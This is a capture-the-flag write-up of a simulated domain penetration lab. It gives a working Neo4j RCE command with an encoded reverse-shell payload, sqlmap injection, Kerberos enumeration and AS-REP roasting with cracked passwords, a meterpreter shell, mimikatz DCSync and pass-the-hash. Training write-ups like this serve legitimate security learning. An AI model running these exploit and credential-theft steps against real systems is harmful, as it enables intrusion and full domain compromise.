Title: Spring and Autumn Cloud Mirror-[Simulation Scene] Time-writeup

Instructions

Time is a shooting range environment with medium difficulty. Completing this challenge can help players understand the technical methods of proxy forwarding, intranet scanning, information collection, privilege escalation and horizontal movement in intranet penetration, strengthen their understanding of the core authentication mechanism of the domain environment, and master some interesting technical points in the domain environment penetration. There are 4 flags in the shooting range, distributed in different target machines.

Technology

Neo4j, Kerberos, Privilege Elevation, Domain Penetration

First flag

Outdoor IP Information Collection

start infoscan

(icmp) Target '39.98.236.25' is alive

icmp alive hosts len is: 1

39.98.236.25:22 open

39.98.236.25:1337 open

39.98.236.25:7474 open

39.98.236.25:7473 open

39.98.236.25:7687 open

39.98.236.25:35555 open

alive ports len is: 6

start vulscan

Completed 0/6 [-] webtitle http://39.98.236.25:7473 Get 'http://39.98.236.25:7473': net/http: HTTP/1.x transport connection broken: malformed HTTP response '\x15\x03\x03\x00\x02\x02P'

[*] WebTitle:http://39.98.236.25:7474 code:200 len:145 title:None

[*] WebTitle:http://39.98.236.25:7687 code:400 len:0 title:None

[*] WebTitle:https://39.98.236.25:7687 code:400 len:0 title:None

Completed 6/6

scan end

neo4j Unauthorized RCE

Neo4j is an open source graph database management system.

In Neo4j 3.4.18 and before, if the Neo4j Shell interface is enabled, an attacker will be able to call any method as an unauthorized identity through the RMI protocol, where the setSessionVariable method has a deserialization vulnerability. Because this vulnerability is not RMI deserialization, it is not affected by the Java version. In Neo4j 3.5 and later versions, Neo4j Shell was replaced by Cyber Shell.

https://github.com/zwjjustdoit/CVE-2021-34371.jar

java -jar rhino_gadget.jar rmi://39.98.236.25:1337 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3R.NC81NTU1IDA+JjE=}|{base64,-d}|{bash,-i}' Bounce shell

Find flag

Get the first flag

The second flag

Intranet penetration

Uploading agent and fscan

start infoscan

Completed 0/0 listen ip4:icmp 0.0.0.0: socket: operation not allowed

trying RunIcmp2

The current user permissions unable to send icmp packets

start ping

(icmp) Target 172.22.6.12 is alive

(icmp) Target 172.22.6.25 is alive

(icmp) Target 172.22.6.38 is alive

(icmp) Target 172.22.6.36 is alive

[*] Icmp alive hosts len is: 4

172.22.6.25:445 open

172.22.6.12:445 open

172.22.6.25:139 open

172.22.6.12:139 open

172.22.6.25:135 open

172.22.6.12:135 open

172.22.6.38:80 open

172.22.6.36:22 open

172.22.6.38:22 open

172.22.6.36:7687 open

172.22.6.12:88 open

[*] alive ports len is: 11

start vulscan

[+] NetInfo:

[*]172.22.6.25

[-]WIN2019

[-]172.22.6.25

[+] NetInfo:

[*]172.22.6.12

[-]DC-PROGAME

[-]172.22.6.12

[*] 172.22.6.12 [+]DC XIAORANG\DC-PROGAME Windows Server 2016 Datacenter 14393

[*] 172.22.6.25 XIAORANG\WIN2019

[*] 172.22.6.12 (Windows Server 2016 Datacenter 14393)

[*] WebTitle:http://172.22.6.38 code:200 len:1531 title: backend login

[*] WebTitle:https://172.22.6.36:7687 code:400 len:50 title:None

Completed 11/11

sql injection

Visit http://172.22.6.38, which is a login page that crawls the data packet

POST /index.php HTTP/1.1

Host: 172.22.6.38

Content-Length: 30

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

Origin: http://172.22.6.38

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: http://172.22.6.38/

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8

Connection: close

username=adminpassword=1111111 Test injection using sqlmap (process omitted)

sqlmap -r 1.txt --dump -T oa_f1Agggg -D oa_db -batch Get the second flag

There are also oa_admin tables and oa_users tables, which collect 500 user names in the users table into dictionary username.txt

‍‍Third flag

Domain User Enumeration

In kerberos' AS-REQ authentication, when the user in the cname value does not exist, the package prompts KDC_ERR_C_PRINCIPAL_UNKNOWN, so when we do not have domain credentials, we can enumerate the domain users from outside the domain through Kerberos pre-auth

https://github.com/ropnop/kerbrute

proxychains ./kerbrute_linux_amd64 userenum --dc 172.22.6.12 -d xiaorang.lab username.txt -t 10kali's proxy execution has not been successful and no results appear. The file is passed to the entry machine and the results are only obtained after remote execution

There are 74 users in total, and they are made into dictionary user.txt

AS-REPRoasting

For domain users, if the option Do not require Kerberos preauthentication is set (Kerberos pre-identification is not required), then send an AS-REQ request to the 88 port of the domain controller, recombining the received AS-REP content, and can be spliced into the format of "Kerberos 5 AS-REP etype 23" (18200). Next, you can use hashcat or john to crack it, and finally obtain the user's plaintext password.

Find an account that has not been pre-authenticated

proxychains python3 GetNPUsers.py -dc-ip 172.22.6.12 -usersfile user.txt xiaorang.lab/

Get two accounts [email protected], [email protected]

[email protected]@XIAORANG.LAB:b6c410706b5e96c693b2fc61ee1064c3$2dc9fbee784e7997333f30c6bc4298ab5752ba94be7022e807af41 8c11359fd92597e253752f4e61d2d18a83f19b5c9df4761e485853a3d879bcf7a270d6f846683b811a80dda3809528190d7f058a24996aff13094ff9b32c0e2698f6d639b4d 237a06d13c309ce7ab428656b79e582609240b01fb5cd47c91573f80f846dc483a113a86977486cecce78c03860050a81ee19921d3500f36ff39fa77edd9d5614cf4b9087d3 e42caef68313d1bb0c4f6bc5392943557b584521b305f61e418eb0f6eb3bf339404892da55134cb4bf828ac318fe00d68d1778b7c82caf03b65f1938e54ed3fa51b63cdb2994

[email protected]@XIAORANG.LAB:971802b84ce99050ad3c5f49d11fd0b7$6c1be075c3cf2a7695529de2ebbf39c5ec7e5326c9d891dac2107b23 9892f76befe52c860e4e1e2ff6537a5765a6bcb6b8baca792d60765ac0bbe1b3c5e59f3ec51b7426636a437d5df12130eb68d9b17ef431455415671c7331a17ce823e28cc41167 7bed341d3fceefc3451b8b232ea6039661625a5c793e30c4d149b2ed9d2926e9d825b3828744ebce69e47746994c9a749ceeb76c560a1840bc74d2b9f301bb5b870c6805915163 54460dab2238e7827900ed80320dd3a6f46874b1bc8a3a68aea7bd11d0683ec94103f59d9511691090928e98d0d8978f511e71fd9db0067fa0d450c120f3726918d7 uses hashcat to decrypt

hashcat -m 18200 --force -a 0 '[email protected]@XIAORANG.LAB:b6c410706b5e96c693b2fc61ee1064c3$2dc9fbee784e7997333f30c6bc4298ab5752ba94be7022e807af4 18c11359fd92597e253752f4e61d2d18a83f19b5c9df4761e485853a3d879bcf7a270d6f846683b811a80dda3809528190d7f058a24996aff13094ff9b32c0e2698f6d639b4d 237a06d13c309ce7ab428656b79e582609240b01fb5cd47c91573f80f846dc483a113a86977486cecce78c03860050a81ee19921d3500f36ff39fa77edd9d5614cf4b9087d3e 42caef68313d1bb0c4f6bc5392943557b584521b305f61e418eb0f6eb3bf339404892da55134cb4bf828ac318fe00d68d1778b7c82caf03b65f1938e54ed3fa51b63cdb2994' rockyou.txt hashcat -m 18200 --force -a 0 '[email protected]@XIAORANG.LAB:971802b84ce99050ad3c5f49d11fd0b7$6c1be075c3cf2a7695529de2ebbf39c5ec7e5326c9d891dac2107 b239892f76befe52c860e4e1e2ff6537a5765a6bcb6b8baca792d60765ac0bbe1b3c5e59f3ec51b7426636a437d5df12130eb68d9b17ef431455415671c7331a17ce823e28cc 411677bed341d3fceefc3451b8b232ea6039661625a5c793e30c4d149b2ed9d2926e9d825b3828744ebce69e47746994c9a749ceeb76c560a1840bc74d2b9f301bb5b870c680 591516354460dab2238e7827900ed80320dd3a6f46874b1bc8a3a68aea7bd11d0683ec94103f59d9511691090928e98d0d8978f511e71fd9db0067fa0d450c120f3726918d7' rockyou.txt This way I got two accounts and passwords

[email protected]/strawberry

[email protected]/hellokitty

Domain Environment Analysis

Log in with domain account 172.22.6.25, upload SharpHound for data collection

SharpHound.exe -c all export file contains multiple jsons, which save various relationships in the domain

Upload data to BloodHound, click Analysis, and find the shortest path to the domain administrator

Find Shortest Paths to Domain Admins The path from thick to thin is the permissions or relationships that xx has on xx, so the path is as follows

From BloodHound, we can know that the next step we need to do the user yuxuan

windows automatic login

HasSession: When a user is having a session with a computer, the credentials will be retained in memory, indicating that yuxuan has logged in to WIN2019

Many users are used to setting up computers to log in automatically, and they can use MSF to grab the username and password for automatically logging in.

Become a positive shell

msfvenom -p windows/meterpreter/bind_tcp -f exe -o shy.exe then upload to target machine win2019 (172.22.6.25) to run

Run msf using proxy and connect

use exploit/multi/handler

set payload windows/meterpreter/bind_tcp

set rhost 172.22.6.25

run Crawl the password for automatic login

meterpreter run windows/gather/credentials/windows_autologin I didn't catch the password here and couldn't continue.

There is no way to keep watching other people's wp continue.

Get yuxuan/Yuxuan7QbrgZ3L by grabbing the password, ok, now we can use yuxuan to log in to WIN2019

Hash pass

HasSIDHistory: The user's SID history. After the user migrates in the domain, the ticket also contains the SID of the group where the previous domain is located. Although the user does not belong to the previous domain, he still has permissions to the previous domain.

Use yuxuan to capture the hash of Administrator

mimikatz.exe 'lsadump:dcsync /domain:xiaorang.lab /user:Administrator' exit smb horizontal WIN2019, get the third flag

proxychains crackmapexec smb 172.22.6.25 -u administrator -H04d93ffd6f5f6e4490e0de23f240a5e9 -d xiaorang.lab -x 'type Users\Administrator\flag\flag03.txt' Original link: https://zhuanlan.zhihu.com/p/582525371